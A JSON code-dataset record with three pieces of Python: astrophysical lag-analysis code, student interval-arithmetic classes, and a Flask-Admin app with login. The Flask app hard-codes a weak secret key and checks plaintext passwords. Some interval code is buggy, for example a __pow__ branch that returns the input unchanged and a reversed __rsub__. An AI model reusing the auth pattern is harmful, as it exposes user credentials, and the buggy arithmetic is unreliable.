-2*np.pi + phase_diff\n else:\n phase_diff_out = phase_diff\n return phase_diff_out\n\ndef make_summary(x, freq_info):\n # x\n x_data = x.reshape(4, int(freq_info[2])).T\n df_x = pd.DataFrame(x_data, columns=['a', 'b', 'c', 'd'])\n # freq\n freq_lo = freq_info[0]\n freq_up = freq_info[1]\n n_freq = int(freq_info[2])\n delta_freq = (freq_up - freq_lo) / n_freq\n df_x['freq'] = freq_lo + delta_freq * (df_x.index.values + 0.5)\n df_x['period'] = 1 / df_x.freq.values\n # norm\n df_x['norm1'] = np.sqrt(df_x.a.values**2 + df_x.b.values**2)\n df_x['norm2'] = np.sqrt(df_x.c.values**2 + df_x.d.values**2)\n df_x['norm12'] = np.sqrt(df_x.norm1.values**2 + df_x.norm2.values**2)\n # lag\n df_x['alpha1'] = np.arctan2(df_x.b[df_x.a != 0], df_x.a[df_x.a != 0])\n df_x['alpha2'] = np.arctan2(df_x.d[df_x.c != 0], df_x.c[df_x.c != 0])\n df_x.fillna(0, inplace=True)\n delta_alpha = list(map(limit_phase, df_x.alpha2 - df_x.alpha1))\n df_x['lag'] = delta_alpha / (2 * np.pi * df_x.freq.values)\n\n df_sum = df_x[['lag', 'norm12', 'norm1', 'norm2', 'period', 'freq']]\\\n [df_x.norm12 > 0]\n\n return df_sum\n\ndef get_index_fromfreq(freq, freq_info):\n freq_lo = freq_info[0]\n freq_up = freq_info[1]\n n_freq = int(freq_info[2])\n delta_freq = (freq_up - freq_lo) / n_freq\n ind = (freq - freq_lo) / delta_freq -0.5\n print(ind)\n return ind\n\ndef get_round_of_2nd_digit(d, mode):\n d_abs = np.abs(d)\n log_d_abs = np.log10(d_abs)\n diff_dig_from_m1 = np.log10(0.1) - np.floor(log_d_abs)\n d_tmp = d * 10**(diff_dig_from_m1 + 1)\n d_tmp2 = np.floor(d_tmp) if mode == 'low' else np.ceil(d_tmp)\n d_out = d_tmp2 / 10**(diff_dig_from_m1 + 1)\n return d_out\n\n\ndef set_bins(low, hig, binsize):\n\n def get_deci_nonzero(a):\n a = float(round(a,10))\n deci_str = str(a).split(\".\")[1]\n for i, num in enumerate(list(deci_str)):\n if num != '0':\n break\n return i+1\n\n low = float(round(low, 10))\n hig = float(round(hig, 10))\n # Get digit\n min_abs = abs(low) if abs(low) <= abs(hig) else abs(hig)\n if min_abs > 1:\n nd_max = 0\n else:\n dig_low = get_deci_nonzero(low)\n dig_hig = get_deci_nonzero(hig)\n nd_max = dig_low if dig_low >= dig_hig else dig_hig\n # Float into integer\n low_tmp = np.floor(low * 10 ** nd_max)\n hig_tmp = np.ceil(hig * 10 ** nd_max)\n binsize_tmp = binsize * 10 ** nd_max\n # Make bins\n bins = np.arange(low_tmp, hig_tmp + binsize_tmp, binsize_tmp)\n # Change digit into original\n bins = bins / 10 **nd_max\n return bins\n\n\nclass Summary:\n\n def __init__(self, df_sum, x_vec, freq_info):\n\n # summary\n self.df_sum = df_sum\n\n # freq\n self.freq_info = freq_info\n n_freq = int(freq_info[2])\n self.freq_list = 
self._make_freqlist(freq_info[0],\n freq_info[1],\n freq_info[2])\n self.freq_lo, self.freq_hi, self.n_freq = self.freq_info\n self.delta_freq = (self.freq_hi - self.freq_lo) / self.n_freq\n\n # x\n self.x = x_vec\n self.x1 = x_vec[:2 * n_freq]\n self.x2 = x_vec[ 2 * n_freq:]\n\n\n def __repr__(self):\n return repr(self.df_sum)\n\n def __add__(self, sum_add):\n\n # serch duplicated record\n id_add = []\n for i, freq_add in enumerate(sum_add.df_sum['freq'].values):\n for j, freq_ori in enumerate(self.df_sum['freq'].values):\n if freq_add == freq_ori:\n id_add.append(i)\n break\n id_rm = np.ones(len(sum_add.df_sum), dtype=bool)\n id_rm[id_add] = False\n\n # add\n df_sum_add = sum_add.df_sum[id_rm]\n df_sum_comb = pd.concat(\n [self.df_sum, df_sum_add]).sort_values('freq')\n return Summary(df_sum_comb.reset_index(drop=True),\n self.x, self.freq_info)\n\n def __sub__(self, sum_sub):\n # serch duplicated record\n id_sub = ~self.df_sum.freq.isin(sum_sub.df_sum.freq)\n return Summary(self.df_sum[id_sub].reset_index(drop=True),\\\n self.x, self.freq_info)\n\n def anti(self):\n df_sum_out = self.df_sum.copy()\n df_sum_out.loc[:,'lag'] = list(map(\n lambda lag, period: lag - period/2 if lag >= 0 else lag + period/2,\n df_sum_out['lag'],\n df_sum_out['period']))\n return Summary(df_sum_out, self.x, self.freq_info)\n\n def unique(self):\n df_sum_original = make_summary(self.x, self.freq_info)\n freq_list= self.df_sum.loc[:,'freq'].values\n df_sum_out = df_sum_original\\\n [df_sum_original.freq.isin(freq_list)].reset_index(drop=True)\n return Summary(df_sum_out, self.x, self.freq_info)\n\n def threshold(self, threshold):\n df_sum_th = self.df_sum.copy()\n df_sum_th['ratio'] = list(map(\n lambda norm1, norm2: norm1/norm2\n if norm1 <= norm2 else norm2/norm1,\n df_sum_th['norm1'].values,\n df_sum_th['norm2'].values\n ))\n df_sum_th = df_sum_th.query('ratio > @threshold').copy()\\\n .reset_index(drop=True)\n df_sum_th.drop('ratio', axis=1, inplace=True)\n return Summary(df_sum_th, self.x, self.freq_info)\n\n def extract(self, ext_ranges):\n # serch\n id_list = []\n for j,lag in enumerate(self.df_sum['lag'].values):\n for ext_range in ext_ranges:\n if ext_range[0] <= lag < ext_range[1]:\n id_list.append(j)\n break\n # choice\n df_sum_out = self.df_sum.iloc[id_list,:].reset_index(drop=True)\n return Summary(df_sum_out, self.x, self.freq_info)\n\n def cut(self, cut_ranges):\n\n # serch\n id_add = []\n for j,lag in enumerate(self.df_sum['lag'].values):\n for cut_range in cut_ranges:\n if cut_range[0] <= lag < cut_range[1]:\n id_add.append(j)\n break\n # choice\n id_rm = np.ones(len(self.df_sum), dtype=bool)\n id_rm[id_add] = False\n df_sum_out = self.df_sum.iloc[id_rm,:].reset_index(drop=True)\n return Summary(df_sum_out, self.x, self.freq_info)\n\n def make_periodicsum(self, lagrange):\n columns = self.df_sum.columns.values\n ndarray_sum = self.df_sum.values\n for para in list(ndarray_sum):\n (lag, norm12, norm1, norm2, period, freq) = para\n # plus\n i = 0\n lag_peri = lag\n while lagrange[0] < lag + (i*period) <= lagrange[1]:\n lag_peri = lag + (i*period)\n new_col = np.array([lag_peri, norm12, norm1,\n norm2, period, freq])\n ndarray_sum = np.vstack([ndarray_sum, new_col])\n i += 1\n # munus\n i = -1\n lag_peri = lag - period\n #while lag_peri > lagrange[0]:\n while lagrange[0] < lag + (i*period) <= lagrange[1]:\n lag_peri = lag + (i*period)\n new_col = np.array([lag_peri, norm12, norm1,\n norm2, period, freq])\n ndarray_sum = np.vstack([ndarray_sum, new_col])\n i += -1\n df_sum_out = 
pd.DataFrame(ndarray_sum, columns=columns)\n return Summary(df_sum_out, self.x, self.freq_info)\n\n\n def pred(self, t1, t2):\n # extract x from sum\n x1_out = self._make_x(self.x1, self.df_sum, self.freq_list)\n x2_out = self._make_x(self.x2, self.df_sum, self.freq_list)\n\n # make y\n A1 = self._make_matrix_dft(t1, self.freq_list)\n A2 = self._make_matrix_dft(t2, self.freq_list)\n x1 = self._make_x(x1_out, self.df_sum, self.freq_list)\n x2 = self._make_x(x2_out, self.df_sum, self.freq_list)\n y1 = np.dot(A1, x1)\n y2 = np.dot(A2, x2)\n\n return y1, y2\n\n def psd(self):\n\n # extract x from sum\n x1_out = self._make_x(self.x1, self.df_sum, self.freq_list)\n x2_out = self._make_x(self.x2, self.df_sum, self.freq_list)\n\n n_freq = self.freq_info[2]\n power1_vec = list(map(\n lambda a, b: np.sqrt(a**2+b**2),\n x1_out[n_freq:],\n x1_out[:n_freq]\n ))\n power2_vec = list(map(\n lambda a, b: np.sqrt(a**2+b**2),\n x2_out[n_freq:],\n x2_out[:n_freq]\n ))\n\n return np.array(power1_vec), np.array(power2_vec)\n\n def resfunc(self, t):\n # extract x from sum\n x1_out = self._make_x(self.x1, self.df_sum, self.freq_list)\n x2_out = self._make_x(self.x2, self.df_sum, self.freq_list)\n x_out = np.hstack([x1_out, x2_out])\n\n # make x of resfunc\n n_freq = self.freq_info[2]\n a = x_out[0 * n_freq : 1 * n_freq]\n b = x_out[1 * n_freq : 2 * n_freq]\n c = x_out[2 * n_freq : 3 * n_freq]\n d = x_out[3 * n_freq : 4 * n_freq]\n delta_f = self.freq_list[1] - self.freq_list[0]\n x_res_real = np.array(list(map(\n lambda a,b,c,d:(a*c+b*d)/(b**2+a**2)/(2*delta_f)\\\n if a != b else 0,\n a, b, c, d)))\n x_res_imag = np.array(list(map(\n lambda a,b,c,d:(a*d-b*c)/(b**2+a**2)/(2*delta_f)\\\n if a != b else 0,\n a, b, c, d)))\n x_res = np.hstack([x_res_real, x_res_imag])\n\n # make y\n A = self._make_matrix_dft(t, self.freq_list)\n y = np.dot(A, x_res)\n return y\n\n def hist(self, lagbins, density=True):\n df_sum_pow = self.df_sum.copy()\n hist_value = pd.cut(df_sum_pow.lag.values, bins=lagbins)\\\n .value_counts().sort_index().values\n if density:\n hist_value = hist_value / len(self.df_sum)\n bins_center = (lagbins[:-1] + lagbins[1:]) / 2\n return bins_center, hist_value\n\n def powerhist(self, lagbins, density=True):\n df_sum_pow = self.df_sum.copy()\n df_sum_pow['id_bins'] = pd.cut(df_sum_pow.lag.values,\n bins=lagbins)\n powerhist_value = df_sum_pow.groupby('id_bins')['norm12']\\\n .sum().values\n if density:\n powerhist_value = powerhist_value / df_sum_pow.norm12.sum()\n bins_center = (lagbins[:-1] + lagbins[1:]) / 2\n return bins_center, powerhist_value\n\n\n def plot_cbplot(self, threshold=None, lagrange=None, ax=None):\n\n import matplotlib.cm as cm\n if ax == None:\n fig, ax = plt.subplots()\n # color babble plot\n size = list(map(\n lambda norm1, norm2: norm1/norm2 if norm1 <= norm2\n else norm2/norm1,\n self.df_sum.norm1.values,\n self.df_sum.norm2.values))\n size_log = np.log10(1 + np.array(size)) * 750\n im = ax.scatter(self.df_sum['lag'].values,\n self.df_sum['norm12'].values,\n c=self.df_sum['freq'].values, cmap=cm.jet,\n alpha=0.8, s=size_log,\n norm=Normalize(self.freq_info[0],\n self.freq_info[1]))\n ax.set_yscale('log')\n ax.set_ylim(np.min(self.df_sum.norm12))\n ax.set_ylabel('Amplitude')\n ax.set_xlabel('Lag')\n if lagrange:\n ax.set_xlim(lagrange)\n\n # colorbat setting\n ax_divider = make_axes_locatable(ax)\n cax = ax_divider.append_axes(\"top\", size=\"7%\", pad=\"2%\")\n plt.colorbar(im, cax=cax, orientation='horizontal')\n cax.xaxis.set_ticks_position(\"top\")\n 
cax.xaxis.set_label_text(\"Frequency\")\n cax.xaxis.set_label_position(\"top\")\n\n return ax\n\n def plot_omplot(self, lagrange=None, lagbinwidth=None,\n lag_mode='standard', ci_list=None, ci_label=None):\n ''' plot omplot which is combined with color babble plot and\n histgram and poer histgram\n\n ci_list: (lag, ci_value)\n ci_label: ci name e.g. 'ci 95%'\n '''\n fig = plt.figure(figsize=(8, 2*2+3))\n height = 0.8/2\n\n # periodic sum\n if lag_mode == 'periodic':\n summ_peri = self.make_periodicsum(lagrange=lagrange)\n self.df_sum = summ_peri.df_sum\n\n # get hist value\n ax0 = fig.add_axes([0.10, 0.1+0*height, 0.85, height-0.2])\n if lagrange == None:\n lag_min = self.df_sum.lag.min()\n lag_max = self.df_sum.lag.max()\n else:\n lag_min = lagrange[0]\n lag_max = lagrange[1]\n if lagbinwidth == None:\n lagbinwidth = (lag_max - lag_min) / 20\n lagbins = set_bins(lag_min, lag_max, lagbinwidth)\n\n # hist and power hist\n bins_center, hist_value = self.hist(lagbins)\n bins_center, phist_value = self.powerhist(lagbins)\n ax0.bar(bins_center, hist_value, color=\"r\", width=lagbinwidth,\n align=\"center\", alpha=0.5, edgecolor=\"k\", label=\"Number\")\n ax0.bar(bins_center, phist_value, color=\"b\", width=lagbinwidth,\n align=\"center\", alpha=0.5, edgecolor=\"k\", label=\"Amplitude\")\n if ci_list:\n ax0.plot(ci_list[0], ci_list[1], label=ci_label,\n color='r', alpha=0.7)\n ax0.set_ylabel('Density')\n ax0.set_xlabel(r'$\\tau$ (s)')\n # ax0.set_xlabel('Lag')\n # ax0.legend(loc='best')\n\n # color babble plot\n ax1 = fig.add_axes([0.10, 0.1+1*height-0.2, 0.85, height+0.2],\n sharex=ax0)\n ax1 = self.plot_cbplot(ax=ax1, lagrange=lagrange)\n ax1.set_xlabel(None)\n plt.setp(ax1.get_xticklabels(), visible=False)\n\n return fig\n\n def _make_freqlist(self, freq_lo, freq_hi, n_freq):\n delta_freq = (freq_hi - freq_lo) / n_freq\n freq_list = np.round(\n np.linspace(\n freq_lo + delta_freq,\n freq_hi,\n n_freq) - delta_freq / 2, 10)\n return freq_list\n\n def _make_matrix_dft(self, t_list, freq_list):\n '''\n make matrix from time and freq\n '''\n delta_freq = freq_list[1] - freq_list[0]\n matrix_phase = 2 * np.pi * np.dot(\n np.array([t_list]).T, np.array([freq_list]))\n matrix_cos = 2 * delta_freq * np.cos(matrix_phase)\n matrix_sin = 2 * delta_freq * np.sin(matrix_phase)\n matrix = np.hstack([matrix_cos, matrix_sin])\n return matrix\n\n\n def _make_x(self, x_vec, df_sum, freq_list):\n \"\"\"make x vector from df_sum\n Return\n x_out: arraylike\n x vector wchich is calcurated by component whare demand lag\n \"\"\"\n # x\n x_vec = np.array(x_vec)\n #\n flg_list = np.zeros(len(freq_list))\n for sum_freq in df_sum['freq'].values:\n rep_sum_freq = np.repeat(np.round(sum_freq,10),\n len(freq_list))\n flg_list_tmp = np.array(list(map(\n lambda x_freq, sum_freq: 1 if x_freq == sum_freq else 0,\n freq_list,\n rep_sum_freq)))\n flg_list += flg_list_tmp\n flg_list = np.tile(flg_list, 2)\n x_out = x_vec * flg_list\n\n return x_out\n\nclass SummaryNew(Summary):\n\n def __init__(self, x_vec, freq_info):\n\n # summary\n self.df_sum = make_summary(x_vec, freq_info)\n\n # freq\n self.freq_info = freq_info\n n_freq = int(freq_info[2])\n self.freq_list = self._make_freqlist(freq_info[0],\n freq_info[1],\n freq_info[2])\n self.freq_lo, self.freq_hi, self.n_freq = self.freq_info\n self.delta_freq = (self.freq_hi - self.freq_lo) / self.n_freq\n\n # x\n self.x = x_vec\n self.x1 = x_vec[:2 * n_freq]\n self.x2 = x_vec[ 2 * n_freq:]\n\nif __name__ == \"__main__\":\n\n # summ = read_summary('example/out/sum.dat',\n # 
'example/out/x.dat', (0,10,2000))\n summ = read_summary('example2/out/sum.dat', 'example2/out/x.dat',\n [0,0.5,200])\n freq_list = summ.freq_list\n\n # summ = summ.ext_from_sum([[0.1,0.3]])\n\n summ1 = summ.extract([[4,9]])\n summ2 = summ.extract([[6,9]])\n print(summ1)\n print(summ2)\n print(summ1 - summ2)\n\n # get value\n t_list = np.linspace(0, 100, 1000)\n y1, y2 = summ.pred(t_list, t_list)\n p1, p2 = summ.psd()\n\n # resfunc\n # t_res = np.linspace(-5,5,100)\n # y_res = summ.resfunc(t_res)\n # plt.plot(t_res, y_res)\n # plt.show()\n\n # # psd\n # fig, ax = plt.subplots(2,1)\n # ax[0].plot(freq_list, p1)\n # ax[1].plot(freq_list, p2)\n # plt.show()\n\n # pred\n data_lc1 = np.loadtxt('example2/data/lc1.dat')\n data_lc2 = np.loadtxt('example2/data/lc2.dat')\n t1 = data_lc1[:,0]\n f1 = data_lc1[:,1]\n t2 = data_lc2[:,0]\n f2 = data_lc2[:,1]\n fig, ax = plt.subplots(2,1, sharex=True)\n ax[0].plot(t1, f1, alpha=0.7, label='Obs')\n ax[0].plot(t_list, y1, alpha=0.7, label='Model')\n ax[0].set_ylabel('X-ray')\n ax[0].set_xlabel('Time')\n ax[0].legend(loc='best')\n ax[1].plot(t2, f2, alpha=0.7)\n ax[1].plot(t_list, y2, alpha=0.7)\n ax[1].set_ylabel('Optical')\n ax[1].set_xlabel('Time')\n plt.subplots_adjust(hspace=0)\n plt.show()\n\n # omplot\n summ.plot_omplot(lagbinwidth=1)\n plt.show()\n"
}
] | 21 |
KanishkaKatipearachchi/Logarithm | https://github.com/KanishkaKatipearachchi/Logarithm | b3aaa678b0fc39d9208c1b6b0eb1d6267b43da6d | ac43a5782e8c230d530a37bb171c6ef71f421cec | 89c6a956909e76c609f53234907f6b169332eb2b | refs/heads/master | 2020-09-21T06:37:51.102126 | 2019-12-17T06:40:58 | 2019-12-17T06:40:58 | 224,711,954 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5440547466278076,
"alphanum_fraction": 0.5590248107910156,
"avg_line_length": 27.487804412841797,
"blob_id": "b303fdb03f0dfc7a6b3e9e89efafa9d98c54f1b3",
"content_id": "eb172272a7fb3533c5cae5a095a993113e4fba22",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4676,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 164,
"path": "/interval.py",
"repo_name": "KanishkaKatipearachchi/Logarithm",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass Interval():\n \"\"\"\n A class representing a closed interval of real numbers.\n This class can undergo arithmetic operations with other intervals,\n and of real numbers, where a real number n is represented as [n, n].\n \"\"\"\n def __init__(self, *args):\n \"\"\"\n Initializes an interval\n Given one numeric parameter\n \"\"\"\n left = args[0]\n if len(args) > 1:\n right = args[1]\n else:\n right = args[0]\n if not is_number(left) or not is_number(right):\n raise ValueError(\"arguments must be numbers\")\n if left <= right:\n self.left = left\n self.right = right\n else:\n self.right = left\n self.left = right\n\n def __add__(self, other):\n \"\"\"\n Adds this interval to another interval\n \"\"\"\n other = as_interval(other)\n return Interval(self.left + other.left, self.right + other.right)\n\n def __radd__(self, other):\n \"\"\"\n The reverse order of the add method\n Addition of intervals is commutative\n \"\"\"\n return self + other\n\n def __sub__(self, other):\n \"\"\"\n Subtracts another interval from this interval\n \"\"\"\n other = as_interval(other)\n return Interval(self.left - other.right, self.right - other.left)\n \n def __rsub__(self, other):\n \"\"\"\n Subtracts this interval from another interval\n \"\"\"\n return as_interval(other) - self\n\n def __mul__(self, other):\n \"\"\"\n Multiplies this interval with another interval\n \"\"\"\n other = as_interval(other)\n combinations = [self.left * other.left, self.left * other.right, self.right * other.left, self.right * other.right]\n return Interval(min(combinations), max(combinations))\n\n def __rmul__(self, other):\n \"\"\"\n Multiplies another interval with this interval\n Multiplication commutes\n \"\"\"\n return self * other\n\n def __div__(self, other):\n \"\"\"\n Divides this interval by another interval\n \"\"\"\n other = as_interval(other)\n combinations = [self.left / other.left, self.left / other.right, self.right / other.left, self.right / other.right]\n return Interval(min(combinations), max(combinations))\n\n def __pow__(self, power):\n \"\"\"\n Takes this interval to an integer power\n \"\"\"\n if type(power) != int:\n raise ValueError(\"power must be an integer\")\n if power % 2 == 0:\n if self.left >= 0:\n return Interval(self.left**power, self.right**power)\n elif self.right < 0:\n return Interval(self.right**power, self.left**power)\n else:\n return Interval(0, max([self.right**power, self.left**power]))\n return Interval(self.left**power, self.right**power)\n\n def __contains__(self, item):\n return item >= self.left and item <= self.right\n\n def __str__(self):\n return \"[%s, %s]\" % (self.left, self.right)\n\ndef as_interval(x):\n \"\"\"\n Returns x, inputted as either a number or an interval, as an interval.\n If x is an interval the function returns just x. 
\n \"\"\"\n if isinstance(x, Interval):\n return x\n return Interval(x)\n\ndef p(i):\n \"\"\"\n The interval polynomial defined in the problem description.\n Returns an interval resulting from the interval parameter.\n \"\"\"\n return 3 * i**3 - 2 * i**2 - 5 * i - 1\n\ndef is_number(x):\n \"\"\"\n Given a data value, returns True if it is of type float or int, False otherwise.\n \"\"\"\n return isinstance(x, int) or isinstance(x, float)\n\n\ndef main():\n \"\"\"\n Main function;\n For testing and demonstrative purposes.\n \"\"\"\n i1 = Interval(1, 4)\n print(i1)\n i2 = Interval(-2, -1)\n print(i2)\n print(i1 + i2)\n print(i1 - i2)\n print(i1 * i2)\n print(i1 / i2)\n print(Interval(2, 3) + 1)\n print(1 + Interval(2, 3))\n print(Interval(2, 3) - 1)\n print(1 - Interval(2, 3))\n print(Interval(2, 3) * 1)\n print(1 * Interval(2, 3))\n x = Interval(-2, 2)\n print(x**2)\n print(x**3)\n\n x = np.linspace(0.0, 1, 1000)\n\n y_intervals = [p(Interval(x[i], x[i] + 0.5)) for i in range(len(x))]\n y_lower = [i.left for i in y_intervals]\n y_upper = [i.right for i in y_intervals]\n\n plt.xlabel(\"x\")\n plt.ylabel(\"p(I)\")\n\n plt.title(\"$p(I) = 3I^3 - 2I^2 - 5I - 1$, I = Interval(x, x + 0.5)\")\n\n plt.plot(x, y_lower)\n plt.plot(x, y_upper)\n plt.savefig(\"interval.png\")\n \n\nif __name__ == \"__main__\":\n main()\n "
},
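A short demonstration of the `Interval` class above (assuming `interval.py` is importable from the working directory). The `x - x` case shows the usual dependency problem of interval arithmetic, and `**` gives a tighter result than `*` for even powers:

```python
from interval import Interval

x = Interval(-1, 2)
print(x - x)   # [-3, 3]: interval arithmetic treats the two x's as independent
print(x * x)   # [-2, 4]
print(x**2)    # [0, 4]: the power operator knows both operands are the same
```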
{
"alpha_fraction": 0.5482901930809021,
"alphanum_fraction": 0.5674676299095154,
"avg_line_length": 36.35652160644531,
"blob_id": "2903ad1e618ad8bee65209787f3fb337874c816d",
"content_id": "b656338ea611a770e9d6cf93bb55c0be7324b14b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4328,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 115,
"path": "/Homework_2.py",
"repo_name": "KanishkaKatipearachchi/Logarithm",
"src_encoding": "UTF-8",
"text": "class Interval:\n \n def __init__( self, left_endpoint, right_endpoint= None ) :\n if right_endpoint==None:\n right_endpoint = left_endpoint\n else:\n pass\n if isinstance( left_endpoint, int) and isinstance( right_endpoint, int) :\n self.left_endpoint = left_endpoint\n self.right_endpoint = right_endpoint\n \n elif isinstance( left_endpoint, float) and isinstance( right_endpoint, int) :\n self.left_endpoint = left_endpoint\n self.right_endpoint = right_endpoint\n \n elif isinstance( left_endpoint, int) and isinstance( right_endpoint, float) :\n self.left_endpoint = left_endpoint\n self.right_endpoint = right_endpoint\n \n elif isinstance( left_endpoint, float) and isinstance( right_endpoint, float) :\n self.left_endpoint = left_endpoint\n self.right_endpoint = right_endpoint\n else:\n raise TypeError(\"left and right intervals must be real numbers\")\n \n \n def __add__( self, other):\n l1, r1 = self.left_endpoint, self.right_endpoint\n if isinstance( other, Interval) :\n l2, r2 = other.left_endpoint, other.right_endpoint\n elif isinstance( other, float) or isinstance( other, int):\n l2, r2 = other, other\n else: \n raise TypeError(\"Must be Intervals\")\n return Interval( l1 + l2, r1 + r2)\n \n def __sub__( self, other):\n l1, r1 = self.left_endpoint, self.right_endpoint\n if isinstance( other, Interval) :\n l2, r2 = other.left_endpoint, other.right_endpoint\n elif isinstance( other, float) or isinstance( other, int):\n l2, r2 = other, other\n else: \n raise TypeError(\"Must be Intervals\")\n return Interval( l1 - r2, r1 - l2)\n\n def __mul__( self, other):\n l1, r1 = self.left_endpoint, self.right_endpoint\n if isinstance( other, Interval) :\n l2, r2 = other.left_endpoint, other.right_endpoint\n elif isinstance( other, float) or isinstance( other, int):\n l2, r2 = other, other\n else: \n raise TypeError(\"Must be Intervals\")\n L=[l1*l2, l1*r2, r1*l2, r1*r2]\n return Interval( min(L), max(L)) \n \n def __truediv__( self, other):\n l1, r1 = self.left_endpoint, self.right_endpoint\n if isinstance( other, Interval) :\n if other.left_endpoint == 0 or other.right_endpoint == 0:\n raise ZeroDivisionError(\"Neither endpoint can be 0\")\n else:\n l2, r2 = other.left_endpoint, other.right_endpoint\n elif isinstance( other, float) or isinstance( other, int):\n if other == 0:\n raise ZeroDivisionError(\"Cannot be zero\")\n else:\n l2, r2 = other, other\n else: \n raise TypeError(\"Must be Intervals\")\n L=[l1/l2, l1/r2, r1/l2, r1/r2]\n return Interval( min(L), max(L))\n \n def __repr__(self):\n return f\"({self.left_endpoint}, {self.right_endpoint})\"\n \n def __contains__( self, number):\n if not isinstance( number, float) and not isinstance( number, int):\n raise TypeError(\"Must give us a real number\")\n else:\n return number >= self.left_endpoint and number <= self.right_endpoint\n \n def __radd__(self, other):\n return self + other\n \n def __rsub__(self, other):\n return self - other\n \n def __rmul__(self, other):\n return self*other\n \n def __pow__(self, other):\n interval = self\n if self.left_endpoint >= 0:\n return Interval(self.left_endpoint**other, self.right_endpoint**other)\n elif self.right_endpoint<0:\n return Interval(self.right_endpoint**other, self.left_endpoint**other)\n else:\n L=[0,max[self.left_endpoint**other, self.right_endpoint**other]]\n return interval\n \nimport matplotlib.pyplot as plt\nimport numpy as np\n\nx1=np.linspace(0., 1, 1000)\nxu=np.linspace(0., 1, 1000)+ 0.5\nl=[]\nu=[]\nfor i in range(len(x1)):\n I=Interval(x1[i], xu[i])\n 
I1=3*I**3-2*I**2-5*I-1\n l.append(I1.left_endpoint)\n u.append(I1.right_endpoint)\nplt.plot(x1,u, x1,l)\n\n\n \n \n "
}
] | 2 |
reciproco/flask-admin-custom | https://github.com/reciproco/flask-admin-custom | 3ecdf160164050266576d5dc366d3e49d52b2cc7 | 79cb22aff9bd4a85667aae396e932383557a71a8 | 2bf1c8cd8e61593251421cd44134e3fbfa4f96a7 | refs/heads/master | 2021-01-19T08:55:06.308326 | 2015-11-30T10:31:41 | 2015-11-30T10:31:41 | 47,061,834 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5756457448005676,
"alphanum_fraction": 0.7749077677726746,
"avg_line_length": 26.100000381469727,
"blob_id": "78b4e27d57e053eb094c5ee4795a2ebf2ce88cb8",
"content_id": "6461e0282e492a91c9908f747f6d35bc5e31253d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 271,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 10,
"path": "/requirements.txt",
"repo_name": "reciproco/flask-admin-custom",
"src_encoding": "UTF-8",
"text": "Flask==0.10.1\n-e git+https://github.com/flask-admin/flask-admin.git@b90bda6055d2915306921d73c0e87ae3cfd7b280#egg=Flask_Admin-master\nFlask-Login==0.3.2\nFlask-SQLAlchemy==2.1\nJinja2==2.8\nMarkupSafe==0.23\nSQLAlchemy==1.0.9\nWTForms==2.0.2\nWerkzeug==0.11.2\nitsdangerous==0.24\n"
},
{
"alpha_fraction": 0.602042555809021,
"alphanum_fraction": 0.6108707189559937,
"avg_line_length": 27.885000228881836,
"blob_id": "bbae377a4ac0e4554dce73cc6ec0c45b47263d56",
"content_id": "ff837807397e778ce29a86d5d7ef3a1611cdff72",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5777,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 200,
"path": "/app.py",
"repo_name": "reciproco/flask-admin-custom",
"src_encoding": "UTF-8",
"text": "from flask import Flask,url_for, redirect, render_template, request\nfrom wtforms import form, fields, validators\nimport flask_login as login\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import func\nimport flask_admin as admin\nfrom flask_admin.contrib import sqla\nfrom flask_admin import helpers, expose\nfrom werkzeug.security import generate_password_hash, check_password_hash\n\n\nCOMERCIAL = 1\n# Create application\napp = Flask(__name__)\n\n\n# Create dummy secrey key so we can use sessions\napp.config['SECRET_KEY'] = '123456790'\n\n# Create in-memory database\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///sample_db_2.sqlite'\napp.config['SQLALCHEMY_ECHO'] = True\ndb = SQLAlchemy(app)\n\n# Flask views\[email protected]('/')\ndef index():\n return '<a href=\"/admin/\">Click me to get to Admin!</a>'\n\nclass User(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n login = db.Column(db.String(80), unique=True)\n password = db.Column(db.String(64))\n\n # Flask-Login integration\n def is_authenticated(self):\n return True\n\n def is_active(self):\n return True\n\n def is_anonymous(self):\n return False\n\n def get_id(self):\n return self.id\n\n # Required for administrative interface\n def __unicode__(self):\n return self.username\n\n# Define login and registration forms (for flask-login)\nclass LoginForm(form.Form):\n login = fields.TextField(validators=[validators.required()])\n password = fields.PasswordField(validators=[validators.required()])\n\n def validate_login(self, field):\n user = self.get_user()\n\n if user is None:\n raise validators.ValidationError('Invalid user')\n\n #if not check_password_hash(user.password, self.password.data):\n if user.password != self.password.data:\n raise validators.ValidationError('Invalid password')\n\n def get_user(self):\n return db.session.query(User).filter_by(login=self.login.data).first()\n\n# Initialize flask-login\ndef init_login():\n login_manager = login.LoginManager()\n login_manager.init_app(app)\n\n # Create user loader function\n @login_manager.user_loader\n def load_user(user_id):\n return db.session.query(User).get(user_id)\n\nclass Car(db.Model):\n __tablename__ = 'cars'\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n desc = db.Column(db.String(50))\n model = db.Column(db.String(50))\n brand = db.Column(db.String(50))\n hidden = db.Column(db.String(50))\n\n def __unicode__(self):\n return self.desc\n\n\n\nclass CarAdmin(sqla.ModelView):\n column_display_pk = True\n form_columns = ['model','brand', 'desc']\n column_searchable_list = ['model', 'brand','desc']\n can_delete = False\n can_create = False\n can_export = True\n\n\n\n def get_query(self):\n return self.session.query(self.model).filter(self.model.hidden==login.current_user.login)\n\n def get_count_query(self):\n return self.session.query(func.count('*')).filter(self.model.hidden == login.current_user.login)\n def is_accessible(self):\n return login.current_user.is_authenticated\n\n# Create customized index view class that handles login & registration\nclass MyAdminIndexView(admin.AdminIndexView):\n\n @expose('/')\n def index(self):\n if not login.current_user.is_authenticated:\n return redirect(url_for('.login_view'))\n return super(MyAdminIndexView, self).index()\n\n @expose('/login/', methods=('GET', 'POST'))\n def login_view(self):\n # handle user login\n form = LoginForm(request.form)\n if 